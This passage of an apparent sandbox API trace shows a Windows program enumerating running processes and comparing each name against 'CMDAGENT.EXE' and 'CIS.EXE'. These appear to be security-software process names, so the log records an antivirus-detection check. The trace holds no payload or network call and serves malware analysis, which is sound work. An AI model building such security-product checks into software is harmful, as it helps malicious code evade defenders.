hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.163] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.163] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.163] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.163] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.163] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.163] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.163] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.163] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.164] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.164] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.164] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.164] lstrlenW (lpString="isolation.exe") returned 13 [0163.164] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.164] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.164] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.165] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.165] lstrlenW (lpString="abc.exe") returned 7 [0163.165] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.165] lstrcmpW (lpString1="ABC.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.165] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.166] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.166] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.166] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.166] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.166] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.167] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.167] lstrlenW (lpString="english_performing.exe") returned 22 [0163.167] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.167] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.167] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.167] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.167] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.167] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.167] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.167] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.168] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.168] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.168] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.168] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.168] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.169] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.169] lstrlenW (lpString="volume.exe") returned 10 [0163.169] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.169] lstrcmpW (lpString1="VOLUME.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.169] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.170] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.170] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.170] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.170] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.170] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.170] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.170] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.171] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.171] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.171] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.171] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.171] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.171] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.171] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.171] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.183] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.183] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.183] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.183] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.183] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.201] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.201] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.201] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.201] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.201] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.201] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.201] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.201] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.201] lstrcmpW (lpString1="EXCEL.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.202] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.202] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.202] lstrlenW (lpString="svchost.exe") returned 11 [0163.202] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.202] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.202] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.203] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.203] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.203] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.203] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.203] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.204] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.204] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.204] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.204] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.204] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.204] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.204] lstrlenW (lpString="svchost.exe") returned 11 [0163.204] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.205] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.205] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.205] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.205] lstrlenW (lpString="svchost.exe") returned 11 [0163.205] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.205] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.205] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.206] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.206] lstrlenW (lpString="winpoint.exe") returned 12 [0163.206] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.206] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.206] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.207] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.207] lstrlenW (lpString="cmd.exe") returned 7 [0163.207] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.207] lstrcmpW (lpString1="CMD.EXE", lpString2="CMDAGENT.EXE") returned -1 [0163.207] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.207] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.207] lstrlenW (lpString="conhost.exe") returned 11 [0163.207] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.208] lstrcmpW (lpString1="CONHOST.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.208] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.208] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.208] lstrlenW (lpString="PING.EXE") returned 8 [0163.208] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.208] lstrcmpW (lpString1="PING.EXE", lpString2="CMDAGENT.EXE") returned 1 [0163.208] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.209] CloseHandle (hObject=0xe0) returned 1 [0163.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.211] lstrcpyW (in: lpString1=0x18f8e4, lpString2="CIS.EXE" | out: lpString1="CIS.EXE") returned="CIS.EXE" [0163.211] lstrlenW (lpString="CIS.EXE") returned 7 [0163.211] CharUpperBuffW (in: lpsz="CIS.EXE", cchLength=0x7 | out: lpsz="CIS.EXE") returned 0x7 [0163.211] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.211] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.212] lstrlenW (lpString="[System Process]") returned 16 [0163.212] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.212] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="CIS.EXE") returned -1 [0163.212] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.212] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.212] lstrlenW (lpString="System") returned 6 [0163.212] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.212] lstrcmpW (lpString1="SYSTEM", lpString2="CIS.EXE") returned 1 [0163.212] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.213] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.213] lstrlenW (lpString="smss.exe") returned 8 [0163.213] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.213] lstrcmpW (lpString1="SMSS.EXE", lpString2="CIS.EXE") returned 1 [0163.213] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.214] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.214] lstrlenW (lpString="csrss.exe") returned 9 [0163.214] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.214] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CIS.EXE") returned 1 [0163.214] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.214] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.215] lstrlenW (lpString="wininit.exe") returned 11 [0163.215] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.215] lstrcmpW (lpString1="WININIT.EXE", lpString2="CIS.EXE") returned 1 [0163.215] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.215] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.215] lstrlenW (lpString="csrss.exe") returned 9 [0163.215] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.215] lstrcmpW (lpString1="CSRSS.EXE", lpString2="CIS.EXE") returned 1 [0163.215] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.216] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.216] lstrlenW (lpString="winlogon.exe") returned 12 [0163.216] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.216] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="CIS.EXE") returned 1 [0163.216] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.217] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.217] lstrlenW (lpString="services.exe") returned 12 [0163.217] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.217] lstrcmpW (lpString1="SERVICES.EXE", lpString2="CIS.EXE") returned 1 [0163.217] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.218] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.218] lstrlenW (lpString="lsass.exe") returned 9 [0163.218] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.218] lstrcmpW (lpString1="LSASS.EXE", lpString2="CIS.EXE") returned 1 [0163.218] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.218] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.218] lstrlenW (lpString="lsm.exe") returned 7 [0163.218] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.218] lstrcmpW (lpString1="LSM.EXE", lpString2="CIS.EXE") returned 1 [0163.218] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.219] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.219] lstrlenW (lpString="svchost.exe") returned 11 [0163.219] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.219] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.219] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.220] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.220] lstrlenW (lpString="svchost.exe") returned 11 [0163.220] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.220] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.220] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 